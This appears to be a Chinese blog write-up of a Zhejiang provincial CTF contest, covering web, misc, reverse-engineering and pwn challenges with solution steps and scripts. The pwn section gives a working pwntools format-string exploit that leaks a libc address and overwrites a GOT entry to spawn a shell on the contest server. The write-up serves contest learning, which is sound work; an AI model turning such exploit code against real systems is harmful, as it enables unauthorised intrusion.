Close

[浙江省网络安全大赛 线上] writeup

浙江省网络安全大赛

ch1pppppppp
第一嘻嘻嘻

web

石庆数码

打开网页点击GOBACK
打开F12里面就有
-w471

眼疾手快

打开网页
看js


var clicks=0 $(function() { $("#cookie") .mousedown(function() { $(this).width('350px').height('350px'); }) .mouseup(function() { $(this).width('375px').height('375px'); clicks++; $("#clickcount").text(clicks); if(clicks >= 1000000){ var form = $('<form action="" method="post">' + '<input type="text" name="clicks" value="' + clicks + '" hidden/>' + '</form>'); $('body').append(form); form.submit(); } }); });

在控制台
-w356
然后点击一下就好了
-w417

你追我赶

56F7D064830B4B154C94DEF7AFAA56B1
AD27619CFCF74D7B3E5615870D2E5271

CAE1304F59AD5B5E41ADC04E21BC75A1
3AD92C62A81E4A25752F4C05387A85E2

misc

躲躲藏藏

把图片下载下来
binwalk一下里面有zip
binwalk -e 一下就可以解压
就可以看到了xls
把xls的文件格式的头改成doc
-w634
可以找到
zjctf{GFDGFA_GGDFFXXFFA_GGADXG_DFDGDGFAFA_GGDFFXXF}
圆盘解密一下就好了

pwn

一夫当关

简单的格式化字符串漏洞,直接给exp:

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

local = 0

if local:
    cn = process('./59XeYrdIHL')
    bin = ELF('./59XeYrdIHL')
else:
    cn = remote('sec4.hdu.edu.cn',9999)
    bin = ELF('./59XeYrdIHL')

def z(a=''):
    gdb.attach(cn,a)
    if a == '':
        raw_input()

buf = '0x%08lx'
cn.sendline(buf)
lbase = int(cn.recvline()[:-1],16) - 0x3C4963
print('lbase: ' +hex(lbase))

a = ((lbase + 0x45216) & 0xff0000) >> 16
b = (lbase + 0x45216) & 0xffff
buf ='%' +str(a)+'x'+'%12$hhn'
buf+='%'+ str(b - a) + 'x'+'%13$hn'
buf = buf.ljust(32,'a')
buf+= p64(0x601018+2)
buf+= p64(0x601018)
cn.sendline(buf)

cn.interactive()

re

逆向逆向

在IDA中分析程序逻辑,不难发现是一个base32加密(去掉了末尾的=进行隐藏),把结果字符串加上被去掉的四个‘=’拖到在线decode网站解密得到flag

加密应用

将apk解压,将得到的dex文件转成jar拖进jd-gui,看到如下函数

package com.example.ctf;

import java.util.Vector;

public class a
{
  int[] aa = { 57, 60, 80, 113, 64, 57, 74, 79, 75, 55, 59, 68, 78, 69, 55, 61, 57, 59, 62, 74, 68, 63, 60, 62, 69, 59, 72, 68, 74, 69, 67, 68, 55, 115, 63 };
  int[] bb = { 1190700, 733784, 659883, 1390032, 656600, 2723220, 632949, 608400, 930852, 1140624, 861258, 1105425, 699867, 1215808, 547658, 689472, 515450, 833508, 670453, 680823, 1072512, 699840, 614169, 719415, 894348, 632100, 942391, 1008600, 895279, 566150, 1065456, 751389, 836294, 1174212, 2937500 };

  public boolean a(String paramString)
  {
    if (paramString.length() != this.aa.length) {
      return false;
    }
    Vector localVector = new Vector();
    int i = 0;
    if (i >= paramString.length()) {
      if (localVector.size() == this.aa.length) {
        i = 0;
      }
    }
    for (;;)
    {
      if (i >= localVector.size())
      {
        return true;
        if (((paramString.charAt(i) < 'A') || (paramString.charAt(i) > 'Z')) && (paramString.charAt(i) != '{') && (paramString.charAt(i) != '}')) {
          return false;
        }
        localVector.add(Integer.valueOf(paramString.charAt(i)));
        i += 1;
        break;
      }
      if (Math.pow(((Integer)localVector.get(i)).intValue(), 3.0D) + Math.pow(((Integer)localVector.get(i)).intValue(), 2.0D) * this.aa[i] != this.bb[i]) {
        return false;
      }
      i += 1;
    }
  }
}

发现可以爆破,脚本如下

import string

aa = [57, 60, 80, 113, 64, 57, 74, 79, 75, 55, 59, 68, 78, 69, 55, 61, 57, 59, 62, 74, 68, 63, 60, 62, 69, 59, 72, 68, 74, 69, 67, 68, 55, 115, 63]
bb = [1190700, 733784, 659883, 1390032, 656600, 2723220, 632949, 608400, 930852, 1140624, 861258, 1105425, 699867, 1215808, 547658, 0xA8540, 515450, 833508, 670453, 680823, 0x105D80, 699840, 614169, 719415, 894348, 632100, 942391, 1008600, 895279, 566150, 0x1041F0, 751389, 836294, 1174212, 2937500]
flag = ''

for i in range(len(aa)):
    for j in string.printable:
        if(pow(ord(j),3) + pow(ord(j),2) * aa[i] == bb[i]):
            flag += j
            break

print(flag)

Leave a Reply

Your email address will not be published. Required fields are marked *